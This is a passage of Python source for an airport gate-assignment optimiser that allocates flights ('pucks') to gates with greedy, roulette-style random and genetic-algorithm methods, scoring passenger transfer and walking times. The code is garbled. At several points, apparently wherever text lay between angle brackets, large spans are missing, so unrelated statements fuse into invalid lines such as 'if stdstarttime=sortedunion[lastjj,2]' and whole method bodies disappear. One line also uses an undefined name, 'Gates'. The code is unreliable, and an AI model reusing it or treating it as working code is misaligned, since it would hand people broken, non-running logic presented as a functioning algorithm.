filepath):\n\t\tself.filepath=filepath\n\t\tself.Pucks,self.Tickets,self.Gates=self.readfile(self.filepath)\n\t\tself.selecttickets=self.select_Tickets(self.Tickets)\n\t\tself.selectpucks=self.select_Puck(self.Pucks)\n\t\tself.Timetable=self.get_timetable(self.selectpucks)\n\n\tdef readfile(self,filepath):\n\t\tPucksfile = open(filepath+'/original_data/Pucks.csv')\n\t\tTicketsfile=open(filepath+'/original_data/Tickets.csv')\n\t\tGatesfile=open(filepath+'/original_data/Gates.csv')\n\t\tsourcePucks=Pucksfile.readlines()\n\t\tsourceTickets=Ticketsfile.readlines()\n\t\tsourceGates=Gatesfile.readlines()\n\t\tPucks=[]\n\t\tTickets=[]\n\t\tGates=[]\n\t\tfor i in sourcePucks:\n\t\t\tPucks.append(i.strip().split(','))\n\t\tfor i in sourceTickets:\n\t\t\tTickets.append(i.strip().split(','))\n\t\tfor i in sourceGates:\n\t\t\ttemp=i.strip().split(',')\n\t\t\ttemp_p=[]\n\t\t\tfor ii in range(len(temp)):\n\t\t\t\tif temp[ii].startswith('\\\"'):\n\t\t\t\t\ttemp_p.append(temp[ii]+temp[ii+1])\n\t\t\t\telif temp[ii].endswith('\\\"'):\n\t\t\t\t\tcontinue\n\t\t\t\telse:\n\t\t\t\t\ttemp_p.append(temp[ii])\n\t\t\tGates.append(temp_p)\n\t\treturn np.array(Pucks),np.array(Tickets),np.array(Gates)\n\n\tdef select_Tickets(self,data):\n\t\tdatasize=len(data)\n\t\tprint('before tickets length:',datasize)\n\t\tindex=np.zeros(datasize).astype(bool)\n\t\tfor ii in range(datasize):\n\t\t\tif data[ii][3].startswith('20') or data[ii][5].startswith('20'):\n\t\t\t\tindex[ii]=True\t\n\t\tselecttickets=data[index]\n\t\tprint('selected tickets length:',len(selecttickets))\n\t\treturn selecttickets\n\n\tdef select_Puck(self,data):\n\t\tdatasize=len(data)\n\t\tprint('before pucks length:',datasize)\n\t\tindex=np.zeros(datasize).astype(bool)\n\t\tfor ii in range(datasize):\n\t\t\tif data[ii][1].startswith('20') or data[ii][6].startswith('20'):\n\t\t\t\tindex[ii]=True\n\t\tselectpucks=data[index]\n\t\tprint('selected pucks length:',len(selectpucks))\n\t\treturn selectpucks\n\n\tdef get_timetable(self,pucks):\n\t\ttimetable=np.zeros(shape=(pucks.shape[0],2),dtype=int)\n\t\tmini=0\n\t\tmindata=1000000\n\t\tfor ii in range(pucks.shape[0]):\n\t\t\tstartday=int(pucks[ii,1][:2])\n\t\t\tendday=int(pucks[ii,6][:2])\n\t\t\tstdstarttime=(startday-19)*1440+int(pucks[ii,2].split(':')[0])*60+int(pucks[ii,2].split(':')[1])\n\t\t\tstdendtime=(endday-19)*1440+int(pucks[ii,7].split(':')[0])*60+int(pucks[ii,7].split(':')[1])+45\n\t\t\t'''\n\t\t\tstartday=time.strptime(pucks[ii,1], \"%d-%b-%y\")\n\t\t\tendday=time.strptime(pucks[ii,6], \"%d-%b-%y\")\n\t\t\tstarttime=time.strptime(pucks[ii,2], \"%H:%M\")\n\t\t\tendtime=time.strptime(pucks[ii,7], \"%H:%M\")\n\t\t\tstdstarttime=(startday.tm_mday-19)*24*60+starttime.tm_hour*60+starttime.tm_min\n\t\t\tstdendtime=(endday.tm_mday-19)*24*60+endtime.tm_hour*60+endtime.tm_min+45\n\t\t\t'''\n\t\t\ttimetable[ii,0]=stdstarttime\n\t\t\ttimetable[ii,1]=stdendtime\n\t\t\tif stdstarttime=sortedunion[lastjj,2]:\n\t\t\t\t\t\t\talignmenttable[sortedunion[jj,0]]=ii\n\t\t\t\t\t\t\tlastjj=jj\n\t\t\t\t\t\t\tnum+=1\t\n\t\tfor ii in rest:\n\t\t\tindex=np.arange(0,self.choosedpucks.shape[0],1).astype(int)\n\t\t\tsubindex=index[self.Indexs[:,ii]]\n\t\t\tsubtimetable=self.choosedtimetable[self.Indexs[:,ii]]\n\t\t\tsubunion=np.concatenate((subindex.reshape(-1,1),subtimetable),axis=1)\n\t\t\tsubtimeindex=np.argsort(subunion,axis=0)\n\t\t\tsortedunion=subunion[subtimeindex[:,2]]\n\t\t\t\n\t\t\tnum=0\n\t\t\tfirst=True\n\t\t\tfor jj in range(sortedunion.shape[0]):\n\t\t\t\tif alignmenttable[sortedunion[jj,0]]==-1:\n\t\t\t\t\tif first:\n\t\t\t\t\t\talignmenttable[sortedunion[jj,0]]=ii\n\t\t\t\t\t\tlastjj=jj\n\t\t\t\t\t\tfirst=False\n\t\t\t\t\t\tnum+=1\n\t\t\t\t\telif sortedunion[jj,1]>=sortedunion[lastjj,2]:\n\t\t\t\t\t\talignmenttable[sortedunion[jj,0]]=ii\n\t\t\t\t\t\tlastjj=jj\n\t\t\t\t\t\tnum+=1\n\t\t\t#print('#########',num)\t\n\t\treturn alignmenttable\n\n\tdef Roulette_gambling(self,pucks,gates,Index,timetable):\n\t\talignmenttable=np.zeros(shape=(pucks.shape[0]),dtype=int)\n\t\talignmenttable-=1\n\t\tgate_sub=[]\n\t\trest=[]\n\t\tposition=np.zeros(shape=(gates.shape[0],3),dtype=int)\n\t\t#position[,] : in colume 0 demention record if it is first;1 demention record lastjj; 2 demention record current position\n\t\ttag=True\n\n\t\tfor ii in range(gates.shape[0]):\n\t\t\tif gates[ii][3].startswith('\\\"') or Gates[ii][4].startswith('\\\"'):\n\t\t\t\trest.append(ii)\n\t\t\tindex=np.arange(0,pucks.shape[0],1).astype(int)\n\t\t\tsubindex=index[Index[:,ii]]\n\t\t\tsubtimetable=timetable[Index[:,ii]]\n\t\t\tsubunion=np.concatenate((subindex.reshape(-1,1),subtimetable),axis=1)\n\t\t\tsubtimeindex=np.argsort(subunion,axis=0)\n\t\t\tsortedunion=subunion[subtimeindex[:,2]]\n\t\t\tgate_sub.append(sortedunion)\n\n\t\twhile tag:\n\t\t\tcountnum=0\n\t\t\trandomindex=np.arange(0,gates.shape[0],1)\n\t\t\tnp.random.shuffle(randomindex)\n\t\t\tfor ii in randomindex:\n\t\t\t\tif ii not in rest:\n\t\t\t\t\tif len(gate_sub[ii])>position[ii,2]:\n\t\t\t\t\t\tif alignmenttable[gate_sub[ii][position[ii,2],0]]==-1:\n\t\t\t\t\t\t\tif position[ii,0]==0:\n\t\t\t\t\t\t\t\talignmenttable[gate_sub[ii][position[ii,2],0]]=ii\n\t\t\t\t\t\t\t\tposition[ii,0]=1\n\t\t\t\t\t\t\t\tposition[ii,1]=position[ii,2]\n\t\t\t\t\t\t\t\tposition[ii,2]+=1\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\telif gate_sub[ii][position[ii,2],1]>=gate_sub[ii][position[ii,1],2]:\n\t\t\t\t\t\t\t\talignmenttable[gate_sub[ii][position[ii,2],0]]=ii\n\t\t\t\t\t\t\t\tposition[ii,1]=position[ii,2]\n\t\t\t\t\t\t\t\tposition[ii,2]+=1\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tposition[ii,2]+=1\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tposition[ii,2]+=1\n\t\t\t\t\t\t\t\n\t\t\t\t\telse:\n\t\t\t\t\t\tcountnum+=1\n\n\t\t\tif countnum==gates.shape[0]-len(rest):\n\t\t\t\ttag=False\n\n\t\ttag=True\n\t\twhile tag:\n\t\t\tcountnum=0\n\t\t\trest=np.array(rest,dtype=int)\n\t\t\tnp.random.shuffle(rest)\n\t\t\tfor ii in rest:\n\t\t\t\tif len(gate_sub[ii])>position[ii,2]:\n\t\t\t\t\tif alignmenttable[gate_sub[ii][position[ii,2],0]]==-1:\n\t\t\t\t\t\tif position[ii,0]==0:\n\t\t\t\t\t\t\talignmenttable[gate_sub[ii][position[ii,2],0]]=ii\n\t\t\t\t\t\t\tposition[ii,0]=1\n\t\t\t\t\t\t\tposition[ii,1]=position[ii,2]\n\t\t\t\t\t\t\tposition[ii,2]+=1\n\t\t\t\t\t\t\t\n\t\t\t\t\t\telif gate_sub[ii][position[ii,2],1]>=gate_sub[ii][position[ii,1],2]:\n\t\t\t\t\t\t\talignmenttable[gate_sub[ii][position[ii,2],0]]=ii\n\t\t\t\t\t\t\tposition[ii,1]=position[ii,2]\n\t\t\t\t\t\t\tposition[ii,2]+=1\n\t\t\t\t\t\t\t\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tposition[ii,2]+=1\n\t\t\t\t\telse:\n\t\t\t\t\t\tposition[ii,2]+=1\n\t\t\t\t\t\t\t\n\t\t\t\telse:\n\t\t\t\t\tcountnum+=1\n\t\t\tif countnum==rest.shape[0]:\n\t\t\t\ttag=False\n\n\t\treturn alignmenttable\n\n\tdef get_result(self):\n\t\tmaxalign=0\n\t\tcounter=0\n\t\twhile counter<20:\n\t\t\t'''\n\t\t\tgreedy distribution use self.distribute_mostpucks(True)\n\t\t\tRoulette_gambling distribution use self.Roulette_gambling(self.choosedpucks,self.Gates,self.Indexs,self.choosedtimetable)\n\t\t\t'''\n\t\t\tAlignmenttable=self.distribute_mostpucks(True)\n\t\t\t#Alignmenttable=self.Roulette_gambling(self.choosedpucks,self.Gates,self.Indexs,self.choosedtimetable)\n\t\t\talign_len=len([kk for kk in Alignmenttable if kk>=0])\n\t\t\tdistribution_match=get_distribution_match(Alignmenttable,self.choosedpucks,self.Gates)\n\t\t\tused_gates=len(set(distribution_match[:,-1]))-1\n\t\t\tif align_len>maxalign:\n\t\t\t\tmaxalign=align_len\n\t\t\t\tmax_distribution_match=np.copy(distribution_match)\n\t\t\t\tmax_used_gates=used_gates\n\t\t\t\tmax_Alignmenttable=np.copy(Alignmenttable)\n\t\t\t\tcounter=0\n\t\t\telse:\n\t\t\t\tcounter+=1\n\t\t\tprint('align_len',align_len)\n\t\t\tprint('used_gates',used_gates)\n\t\t#print(max_Alignmenttable)\n\t\tprint('maxalign',maxalign)\n\t\tprint('max_used_gates',max_used_gates)\n\t\tsaveresult(max_distribution_match)\n\t\tgate_shiyonglv(max_Alignmenttable,self.choosedtimetable,self.Gates)\n\t\tWa,Na=getNWdistribution(max_Alignmenttable,self.Gates)\n\t\tprint('Wide_plane and Narrow_plane tistribution num ',Wa,Na)\n\n\nclass evolution:\n\t\"\"\"\n\tthis is the main part of genetic alogrithm, there's three method to generate original gene group, first method is generate_original_group(),this is a random method\n\tsecond is use greedy_object.distribute_mostpucks(True), this is the solution of problem 1\n\tthird one is use greedy_object.Roulette_gambling(self.pucks,self.gates,self.Indexs,self.timetable) this is more suitable for generate original gene group\n\tbefore every iteration, a deal_conflict() should be called to deal with confilct. but after deal_conflict(), there are some -1\n\tso before select/exchange/variation a step to remove -1 is needed\n\t\"\"\"\n\tdef __init__(self,index,pucks,gates,tickets,timetable,problemnum):\n\t\tself.group_num=200\n\t\tself.old_group_num=self.group_num\n\t\tself.tag=False\n\t\tself.Indexs=index\n\t\tself.pucks=pucks\n\t\tself.gates=gates\n\t\tself.tickets=tickets\n\t\tself.timetable=timetable\n\t\tself.problem=problemnum\n\t\tself.greedy_object=greedy_select(self.pucks,self.gates,self.timetable,self.Indexs)\n\t\t'''\n\t\tif you want to random generate orginal gene group, use generate_original_group(self.Indexs,self.group_num)\n\t\tif you want to generate orginal gene group with greedy selection or Roulette_gambling use generate_group_greedy(self.group_num)\n\t\t'''\n\t\t#self.group=self.generate_original_group(self.Indexs,self.group_num)\n\t\tself.group=self.generate_group_greedy(self.group_num)\n\t\tif self.problem==2:\n\t\t\tself.gate_weight=8\n\t\t\tself.time_weight=2\n\t\t\tself.gate_num_weight=1\n\t\tif self.problem==3:\n\t\t\tself.gate_weight=0.1\n\t\t\tself.time_weight=10\n\t\t\tself.gate_num_weight=1\n\t\tself.remain_best_num=4\n\t\tself.newgene_num=2*self.group_num//50\n\t\tself.exchange_gene_num=2\n\t\tself.gene_length=self.pucks.shape[0]\n\t\tself.iteration_step=0\n\t\tself.counter=0\n\t\tself.match_flight()\n\t\tself.get_group_score()\n\t\tself.rank_group()\n\t\tself.best_so_far=np.copy(self.group[:self.remain_best_num])\n\t\tself.best_so_far_score=np.copy(self.group_score[:self.remain_best_num])\n\t\t#print(self.Indexs)\n\n\tdef generate_group_greedy(self,num):\n\t\tgroup=[]\n\t\tfor ii in range(num):\n\t\t\tgene=self.greedy_object.Roulette_gambling(self.pucks,self.gates,self.Indexs,self.timetable)\n\t\t\t#gene=self.greedy_object.distribute_mostpucks(True)\n\t\t\tgroup.append(gene)\n\t\tgroup=np.array(group,dtype=int)\n\t\treturn group\n\n\n\tdef generate_original_group(self,index,num):\n\t\toriginal_group=[]\n\t\tdate_num=np.arange(0,index.shape[1],1).astype(int)\n\t\tfor ii in range(num):\n\t\t\toriginal_gene=np.zeros(shape=(index.shape[0]),dtype=int)\n\t\t\tfor jj in range(index.shape[0]):\n\t\t\t\tgate_set=date_num[index[jj]]\n\t\t\t\ta=np.random.randint(low=0,high=len(gate_set),size=1)\n\t\t\t\toriginal_gene[jj]=gate_set[a]\n\t\t\toriginal_group.append(original_gene)\n\t\toriginal_group=np.array(original_group,dtype=int)\n\t\treturn original_group\n\n\n\tdef match_flight(self):\n\t\tticketssize=self.tickets.shape[0]\n\t\tpucksize=self.pucks.shape[0]\n\t\tmatch_table=np.zeros(shape=(ticketssize,3),dtype=int)\n\t\tmatch_table=match_table-1\n\t\tfor ii in range(ticketssize):\n\t\t\tmatch_table[ii,0]=int(self.tickets[ii,1])\n\t\t\tfor jj in range(pucksize):\n\t\t\t\tif self.pucks[jj,1]==self.tickets[ii,3] and self.pucks[jj,3]==self.tickets[ii,2]:\n\t\t\t\t\tmatch_table[ii,1]=jj\n\t\t\t\t\tbreak;\n\t\t\tfor jj in range(pucksize):\n\t\t\t\tif self.pucks[jj,6]==self.tickets[ii,5] and self.pucks[jj,8]==self.tickets[ii,4]:\n\t\t\t\t\tmatch_table[ii,2]=jj\n\t\t\t\t\tbreak;\n\t\tself.match_table=match_table\n\t\t\n\n\tdef deal_conflict(self,gene):\n\t\tpucksize=self.pucks.shape[0]\n\t\tgatesize=self.gates.shape[0]\n\t\tconflict_position=np.zeros(shape=(pucksize),dtype=int)\n\n\t\tgate_set=[[] for i in range(gatesize)]\n\t\tfor ii in range(pucksize):\n\t\t\tif gene[ii]!=-1:\n\t\t\t\tgate_set[int(gene[ii])].append(ii)\n\t\t\telse:\n\t\t\t\tconflict_position[ii]=1\n\t\tfor ii in range(gatesize):\n\t\t\tcontainsize=len(gate_set[ii])\n\t\t\t#print('gate %d'%ii,gate_set[ii])\n\t\t\tif containsize>=2:\n\t\t\t\tlastpoint=0\n\t\t\t\tfor jj in range(containsize-1):\n\t\t\t\t\tif self.timetable[gate_set[ii][jj+1],0](self.timetable[self.match_table[ii,1],1]-45):\n\t\t\t\t\t\tself.missedflghtnum=self.missedflghtnum+self.match_table[ii,0]\n\n\t\t\t\t\ttimecost=cost_table[keyi,keyj]*self.match_table[ii,0]\n\t\t\t\t\t#print('#####',keyi,keyj,timecost,self.match_table[ii,0])\n\t\t\t\telse:\n\t\t\t\t\terrortimecost=50*self.match_table[ii,0]\n\t\t\t\ttotalcost=totalcost+timecost+errortimecost\n\t\t\t\ttotal_matched_cost=total_matched_cost+timecost\n\t\tsroce=self.gate_weight*matchsize/gene.shape[0]+self.time_weight*total_matched_cost/(sum(self.match_table[:,0])*30)+self.gate_num_weight*gate_num/self.gates.shape[0]\n\n\t\treturn sroce,totalcost,total_matched_cost\n\n\n\tdef calculate_sroce_problem3(self,gene):\n\t\tmatchsize=len([ii for ii in gene if ii==-1])\n\t\ttotalcost=0\n\t\thangban_time=0\n\t\ttotal_matched_cost=0\n\t\tticketssize=self.tickets.shape[0]\n\t\tcost_table=np.array([[15,20,35,40],[20,15,40,35],[35,40,20,30],[40,45,30,20]]).reshape((4,4)).astype(int)\n\t\tjieyun_table=np.array([[0,1,0,1],[1,0,1,0],[0,1,0,1],[1,2,1,0]]).reshape((4,4)).astype(int)\n\t\twalk_table=np.array([10,15,20,25,20,25,25,0,10,15,20,15,20,20,0,0,10,25,20,25,25,0,0,0,10,15,20,20,0,0,0,0,10,15,15,0,0,0,0,0,10,20,0,0,0,0,0,0,10]).reshape(7,7)\n\t\tself.passengernum=0\n\t\tself.missedflghtnum=0\n\t\tself.huancheng_time=[]\n\t\tself.gerenjingzhangdu=[]\t\t\n\t\tfor ii in range(ticketssize):\n\t\t\tif self.match_table[ii,1]!=-1 and self.match_table[ii,2]!=-1:\n\t\t\t\ttimecost=0\n\t\t\t\terrortimecost=0\n\t\t\t\tif gene[self.match_table[ii,1]]!=-1 and gene[self.match_table[ii,2]]!=-1:\n\t\t\t\t\tif self.pucks[self.match_table[ii,1],4]=='D':\n\t\t\t\t\t\tif self.gates[gene[self.match_table[ii,1]],1]=='T':\n\t\t\t\t\t\t\tkeyi=0\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tkeyi=1\n\t\t\t\t\telse:\n\t\t\t\t\t\tif self.gates[gene[self.match_table[ii,1]],1]=='T':\n\t\t\t\t\t\t\tkeyi=2\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tkeyi=3\n\t\t\t\t\tif self.pucks[self.match_table[ii,2],4]=='D':\n\t\t\t\t\t\tif self.gates[gene[self.match_table[ii,2]],1]=='T':\n\t\t\t\t\t\t\tkeyj=0\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tkeyj=1\n\t\t\t\t\telse:\n\t\t\t\t\t\tif self.gates[gene[self.match_table[ii,2]],1]=='T':\n\t\t\t\t\t\t\tkeyj=2\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tkeyj=3\n\n\t\t\t\t\tif self.gates[gene[self.match_table[ii,1]],1]=='T':\n\t\t\t\t\t\tif self.gates[gene[self.match_table[ii,1]],2]=='North':\n\t\t\t\t\t\t\taerai=0\n\t\t\t\t\t\telif self.gates[gene[self.match_table[ii,1]],2]=='Center':\n\t\t\t\t\t\t\taerai=1\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\taerai=2\n\t\t\t\t\telse:\n\t\t\t\t\t\tif self.gates[gene[self.match_table[ii,1]],2]=='North':\n\t\t\t\t\t\t\taerai=3\n\t\t\t\t\t\telif self.gates[gene[self.match_table[ii,1]],2]=='Center':\n\t\t\t\t\t\t\taerai=4\n\t\t\t\t\t\telif self.gates[gene[self.match_table[ii,1]],2]=='South':\n\t\t\t\t\t\t\taerai=5\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\taerai=6\n\t\t\t\t\tif self.gates[gene[self.match_table[ii,2]],1]=='T':\n\t\t\t\t\t\tif self.gates[gene[self.match_table[ii,2]],2]=='North':\n\t\t\t\t\t\t\taeraj=0\n\t\t\t\t\t\telif self.gates[gene[self.match_table[ii,2]],2]=='Center':\n\t\t\t\t\t\t\taeraj=1\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\taeraj=2\n\t\t\t\t\telse:\n\t\t\t\t\t\tif self.gates[gene[self.match_table[ii,2]],2]=='North':\n\t\t\t\t\t\t\taeraj=3\n\t\t\t\t\t\telif self.gates[gene[self.match_table[ii,2]],2]=='Center':\n\t\t\t\t\t\t\taeraj=4\n\t\t\t\t\t\telif self.gates[gene[self.match_table[ii,2]],2]=='South':\n\t\t\t\t\t\t\taeraj=5\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\taeraj=6\n\n\n\t\t\t\t\tif aeraj>=aerai:\n\t\t\t\t\t\twalk_time=walk_table[aerai,aeraj]\n\t\t\t\t\telse:\n\t\t\t\t\t\twalk_time=walk_table[aeraj,aerai]\n\t\t\t\t\ttimecost=(cost_table[keyi,keyj]+jieyun_table[keyi,keyj]*8+walk_time)*self.match_table[ii,0]\n\n\t\t\t\t\tself.huancheng_time.append([timecost,self.match_table[ii,0]])\n\t\t\t\t\tself.passengernum=self.passengernum+self.match_table[ii,0]\n\t\t\t\t\tif (timecost+self.timetable[self.match_table[ii,0],0])>(self.timetable[self.match_table[ii,1],1]-45):\n\t\t\t\t\t\tself.missedflghtnum=self.missedflghtnum+self.match_table[ii,0]\n\n\t\t\t\t\tdanrenhuangbantime=(self.timetable[self.match_table[ii,1],1]-self.timetable[self.match_table[ii,0],0]-45)*self.match_table[ii,0]\n\t\t\t\t\thangban_time=hangban_time+danrenhuangbantime\n\t\t\t\t\tself.gerenjingzhangdu.append([timecost/danrenhuangbantime,self.match_table[ii,0]])\n\n\t\t\t\telse:\n\t\t\t\t\terrortimecost=100*self.match_table[ii,0]\n\t\t\t\ttotalcost=totalcost+timecost+errortimecost\n\t\t\t\ttotal_matched_cost=total_matched_cost+timecost\n\t\tscore=self.gate_weight*matchsize/gene.shape[0]+self.time_weight*total_matched_cost/hangban_time\n\n\t\treturn score,totalcost,total_matched_cost/hangban_time\n\n\n\n\tdef get_group_score(self):\n\t\tgroup_score=[]\n\t\tgroup_totalcost=[]\n\t\tgroup_total_matched_cost=[]\n\t\tself.group_conflict_position=np.zeros(shape=(self.group_num,self.pucks.shape[0]),dtype=int)\n\t\tfor ii in range(self.group_num):\n\t\t\tgene,conflict_position=np.array(self.deal_conflict(self.group[ii]),dtype=int)\n\t\t\tif self.problem==2:\n\t\t\t\tsroce,totalcost,total_matched_cost=self.calculate_sroce_problem2(gene)\n\t\t\telif self.problem==3:\n\t\t\t\tsroce,totalcost,total_matched_cost=self.calculate_sroce_problem3(gene)\n\t\t\tgroup_score.append(sroce)\n\t\t\tgroup_totalcost.append(totalcost)\n\t\t\tgroup_total_matched_cost.append(total_matched_cost)\n\t\t\tself.group[ii]=gene\n\t\t\tself.group_conflict_position[ii]=conflict_position\n\t\tself.group_score=np.array(group_score)\n\t\tself.group_totalcost=np.array(group_totalcost)\n\t\tself.group_total_matched_cost=np.array(group_total_matched_cost)\n\n\n\t\n\tdef rank_group(self):\n\t\tindex=np.argsort(self.group_score)\n\t\tself.group=self.group[index]\n\t\tself.group_score=self.group_score[index]\n\t\tself.group_totalcost=self.group_totalcost[index]\n\t\tself.group_total_matched_cost=self.group_total_matched_cost[index]\n\t\tself.group_conflict_position=self.group_conflict_position[index]\n\t\t#print('totalcost :5',self.group_totalcost[:5])\n\t\tprint('cost :5',self.group_total_matched_cost[:5])\n\t\t\t\t\t\t\n\tdef exchange_gene(self,selective_gene):\n\t\tnewgene=self.generate_group_greedy(self.newgene_num)\n\t\t#newgene=self.generate_original_group(self.Indexs,self.newgene_num)\n\t\tselective_gene=np.concatenate((selective_gene,newgene),axis=0)\n\t\tnp.random.shuffle(selective_gene)\n\t\tfor ii in range(0,self.group_num-self.remain_best_num,2):\n\t\t\tcross_point=np.random.randint(0,self.gene_length,size=(2*self.exchange_gene_num))\n\t\t\tcross_point=np.sort(cross_point)\n\t\t\tfor jj in range(self.exchange_gene_num):\n\t\t\t\trandom_data=np.random.uniform(low=0,high=1)\n\t\t\t\tif random_data<0.8:\n\t\t\t\t\ttemp=np.copy(selective_gene[ii,cross_point[jj*2]:cross_point[jj*2+1]])\n\t\t\t\t\tselective_gene[ii,cross_point[jj*2]:cross_point[jj*2+1]]=selective_gene[ii+1,cross_point[jj*2]:cross_point[jj*2+1]]\t\t\t\n\t\t\t\t\tselective_gene[ii+1,cross_point[jj*2]:cross_point[jj*2+1]]=np.copy(temp)\t\n\n\n\tdef gene_variation(self,selective_gene):\n\t\tindex=np.arange(0,self.gates.shape[0],1).astype(int)\n\t\tfor ii in range(self.group_num-self.remain_best_num):\n\t\t\trandom_data=np.random.uniform(low=0,high=1,size=(self.gene_length))\n\t\t\tfor jj in range(self.gene_length):\n\t\t\t\tif random_data[jj]<0.05:\n\t\t\t\t\tvariationset=index[self.Indexs[jj]]\n\t\t\t\t\tgene_point=np.random.randint(low=0,high=len(variationset))\n\t\t\t\t\tselective_gene[ii,jj]=variationset[gene_point]\n\n\t\n\tdef select_group(self):\n\t\tmixture=np.concatenate((self.group,self.group_score.reshape((-1,1))),axis=1)\n\t\tnp.random.shuffle(mixture)\n\t\tself.group=mixture[:,:self.gene_length]\n\t\tself.group_score=mixture[:,-1].reshape((-1))\n\t\tselected_group=np.zeros(shape=(self.group_num-self.remain_best_num,self.gene_length))\n\t\tselected_group_score=np.zeros(shape=(self.group_num-self.remain_best_num))\n\t\tfor ii in range(self.group_num-self.remain_best_num):\n\t\t\ta=np.random.randint(0,self.group_num)\n\t\t\tb=np.random.randint(0,self.group_num)\n\t\t\tif self.group_score[a]self.threhold:\n\t\t\t\t\tself.tag=True\n\t\t\t\t\tself.threhold=self.threhold*1.5\n\t\t\t\t\tself.group_num=self.group_num-50\n\t\t\t\t\tself.counter=0\n\t\t\t\t\tif self.group_num<50:\n\t\t\t\t\t\tif self.problem==2:\n\t\t\t\t\t\t\tself.calculate_sroce_problem2(self.group[0].astype(int))\n\t\t\t\t\t\tif self.problem==3:\n\t\t\t\t\t\t\tself.calculate_sroce_problem3(self.group[0].astype(int))\n\t\t\t\t\t\tprint('missed flght passenger num: ',self.missedflghtnum)\n\t\t\t\t\t\tprint('total aligned passenger num: ',self.passengernum)\n\t\t\t\t\t\tnum_t=np.zeros(shape=(10),dtype=int)\n\t\t\t\t\t\tfor ii in range(len(self.huancheng_time)):\n\t\t\t\t\t\t\tif self.huancheng_time[ii][0]<=15:\n\t\t\t\t\t\t\t\tnum_t[0]=num_t[0]+self.huancheng_time[ii][1]\n\t\t\t\t\t\t\tif self.huancheng_time[ii][0]<=20:\n\t\t\t\t\t\t\t\tnum_t[1]=num_t[1]+self.huancheng_time[ii][1]\n\t\t\t\t\t\t\tif self.huancheng_time[ii][0]<=25:\n\t\t\t\t\t\t\t\tnum_t[2]=num_t[2]+self.huancheng_time[ii][1]\n\t\t\t\t\t\t\tif self.huancheng_time[ii][0]<=30:\n\t\t\t\t\t\t\t\tnum_t[3]=num_t[3]+self.huancheng_time[ii][1]\n\t\t\t\t\t\t\tif self.huancheng_time[ii][0]<=35:\n\t\t\t\t\t\t\t\tnum_t[4]=num_t[4]+self.huancheng_time[ii][1]\n\t\t\t\t\t\t\tif self.huancheng_time[ii][0]<=40:\n\t\t\t\t\t\t\t\tnum_t[5]=num_t[5]+self.huancheng_time[ii][1]\n\t\t\t\t\t\t\tif self.huancheng_time[ii][0]<=45:\n\t\t\t\t\t\t\t\tnum_t[6]=num_t[6]+self.huancheng_time[ii][1]\n\t\t\t\t\t\t\tif self.huancheng_time[ii][0]<=50:\n\t\t\t\t\t\t\t\tnum_t[7]=num_t[7]+self.huancheng_time[ii][1]\n\t\t\t\t\t\t\tif self.huancheng_time[ii][0]<=55:\n\t\t\t\t\t\t\t\tnum_t[8]=num_t[8]+self.huancheng_time[ii][1]\n\t\t\t\t\t\t\tif self.huancheng_time[ii][0]<=60:\n\t\t\t\t\t\t\t\tnum_t[9]=num_t[9]+self.huancheng_time[ii][1]\n\t\t\t\t\t\tprint('shijian fenbu bi lv: ',num_t/self.passengernum)\n\n\t\t\t\t\t\tif self.problem==3:\n\t\t\t\t\t\t\tbbb=np.zeros(shape=(8))\n\t\t\t\t\t\t\tfor ii in range(len(self.gerenjingzhangdu)):\n\t\t\t\t\t\t\t\tif self.gerenjingzhangdu[ii][0]<=0.01:\n\t\t\t\t\t\t\t\t\tbbb[0]=bbb[0]+self.gerenjingzhangdu[ii][1]\n\t\t\t\t\t\t\t\tif self.gerenjingzhangdu[ii][0]<=0.015:\n\t\t\t\t\t\t\t\t\tbbb[1]=bbb[1]+self.gerenjingzhangdu[ii][1]\n\t\t\t\t\t\t\t\tif self.gerenjingzhangdu[ii][0]<=0.02:\n\t\t\t\t\t\t\t\t\tbbb[2]=bbb[2]+self.gerenjingzhangdu[ii][1]\n\t\t\t\t\t\t\t\tif self.gerenjingzhangdu[ii][0]<=0.025:\n\t\t\t\t\t\t\t\t\tbbb[3]=bbb[3]+self.gerenjingzhangdu[ii][1]\n\t\t\t\t\t\t\t\tif self.gerenjingzhangdu[ii][0]<=0.03:\n\t\t\t\t\t\t\t\t\tbbb[4]=bbb[4]+self.gerenjingzhangdu[ii][1]\n\t\t\t\t\t\t\t\tif self.gerenjingzhangdu[ii][0]<=0.035:\n\t\t\t\t\t\t\t\t\tbbb[5]=bbb[5]+self.gerenjingzhangdu[ii][1]\n\t\t\t\t\t\t\t\tif self.gerenjingzhangdu[ii][0]<=0.04:\n\t\t\t\t\t\t\t\t\tbbb[6]=bbb[6]+self.gerenjingzhangdu[ii][1]\n\t\t\t\t\t\t\t\tif self.gerenjingzhangdu[ii][0]>0.045:\n\t\t\t\t\t\t\t\t\tbbb[7]=bbb[7]+self.gerenjingzhangdu[ii][1]\n\t\t\t\t\t\t\tprint('jing zhang du ren shu fen bu:',bbb)\n\n\t\t\t\t\t\treturn self.group[0].astype(int),self.group_total_matched_cost[0]\n\n\tdef get_result(self):\n\t\tAlignmenttable,cost=self.evolution_iteration()\n\t\talignlen=len([kk for kk in Alignmenttable if kk>=0])\n\t\tdistribution_match=get_distribution_match(Alignmenttable,self.pucks,self.gates)\n\t\tused_gates=len(set(distribution_match[:,-1]))-1\n\t\t#print(Alignmenttable)\n\t\tprint('align num',alignlen)\n\t\tprint('used gates num',used_gates)\n\t\tif self.problem==3:\n\t\t\tprint('zong ti jingzhang du: ',cost)\n\t\telif self.problem==2:\n\t\t\tprint('liucheng time cost: ',cost)\n\t\tsaveresult(distribution_match)\n\t\tgate_shiyonglv(Alignmenttable,self.timetable,self.gates)\n\t\tWa,Na=getNWdistribution(Alignmenttable,self.gates)\n\t\tprint('Wide_plane and Narrow_plane tistribution num ',Wa,Na)\n\n\n#tongji feiji shi jian fen bu\ndef distribution(timetable):\n\tstarttime=np.min(timetable)\n\tendtime=np.max(timetable)\n\tprint('##################',starttime,endtime)\n\tsize=(endtime-starttime)//5\n\tstatistic_time=np.zeros(shape=(size),dtype=int)\n\tfor 